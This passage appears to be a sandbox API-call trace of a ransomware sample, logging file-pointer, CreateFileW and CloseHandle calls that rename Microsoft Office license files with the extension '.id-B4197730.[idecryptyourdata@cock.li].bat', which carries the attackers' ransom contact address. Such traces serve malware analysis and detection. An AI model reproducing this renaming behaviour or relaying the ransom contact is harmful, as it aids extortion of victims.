lpNewFilePointer=0x0) returned 1 [0164.724] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_OEM_Perp-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_oem_perp-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.724] CloseHandle (hObject=0x514) returned 1 [0164.725] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.725] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.725] CloseHandle (hObject=0x514) returned 1 [0164.727] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.727] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.727] CloseHandle (hObject=0x514) returned 1 [0164.728] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.728] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.728] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.728] CloseHandle (hObject=0x514) returned 1 [0164.729] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.729] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.729] CloseHandle (hObject=0x514) returned 1 [0164.730] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.730] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.730] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Trial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_trial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.730] CloseHandle (hObject=0x514) returned 1 [0164.731] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.731] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Trial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_trial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.731] CloseHandle (hObject=0x514) returned 1 [0164.732] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.732] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.732] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Trial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_trial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.732] CloseHandle (hObject=0x514) returned 1 [0164.733] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.733] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.733] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_KMS_Client-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_kms_client-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.733] CloseHandle (hObject=0x514) returned 1 [0164.734] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.734] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.734] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_KMS_Client-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_kms_client-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.734] CloseHandle (hObject=0x514) returned 1 [0164.735] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.735] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.735] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_KMS_Client-ul.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_kms_client-ul.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.735] CloseHandle (hObject=0x514) returned 1 [0164.736] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.736] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.736] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_MAK-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_mak-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.736] CloseHandle (hObject=0x514) returned 1 [0164.738] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.738] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.738] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_MAK-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_mak-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.738] CloseHandle (hObject=0x514) returned 1 [0164.739] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.739] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.739] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_MAK-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_mak-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.739] CloseHandle (hObject=0x514) returned 1 [0164.740] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.740] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_MAK-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_mak-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.740] CloseHandle (hObject=0x514) returned 1 [0165.936] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.936] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessentryr_prepidbypass-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.405] CloseHandle (hObject=0x4c4) returned 1 [0166.406] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.406] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.406] CloseHandle (hObject=0x4c4) returned 1 [0166.407] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.407] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.407] CloseHandle (hObject=0x4c4) returned 1 [0166.408] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.408] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_KMS_Client-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_kms_client-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.409] CloseHandle (hObject=0x4c4) returned 1 [0166.409] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.409] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.409] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_KMS_Client-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_kms_client-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.410] CloseHandle (hObject=0x4c4) returned 1 [0166.410] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.410] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.410] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_KMS_Client-ul.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_kms_client-ul.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.411] CloseHandle (hObject=0x4c4) returned 1 [0166.411] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.411] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.411] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_MAK-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_mak-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.412] CloseHandle (hObject=0x4c4) returned 1 [0166.412] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.412] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.412] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_MAK-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_mak-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.413] CloseHandle (hObject=0x4c4) returned 1 [0166.413] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.413] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.413] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_MAK-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_mak-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.414] CloseHandle (hObject=0x4c4) returned 1 [0166.414] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.414] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.414] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_MAK-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_mak-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.415] CloseHandle (hObject=0x4c4) returned 1 [0166.415] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.415] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.415] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.416] CloseHandle (hObject=0x4c4) returned 1 [0166.416] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.416] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.417] CloseHandle (hObject=0x4c4) returned 1 [0166.417] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.417] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_OEM_Perp-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_oem_perp-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.418] CloseHandle (hObject=0x4c4) returned 1 [0166.418] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.418] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_OEM_Perp-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_oem_perp-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.419] CloseHandle (hObject=0x4c4) returned 1 [0166.419] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.419] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.419] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_OEM_Perp-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_oem_perp-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.420] CloseHandle (hObject=0x4c4) returned 1 [0166.593] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.593] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_OEM_Perp-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_oem_perp-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.593] CloseHandle (hObject=0x4c4) returned 1 [0166.594] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.594] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.594] CreateFileW (lpFileName="C:\\Program 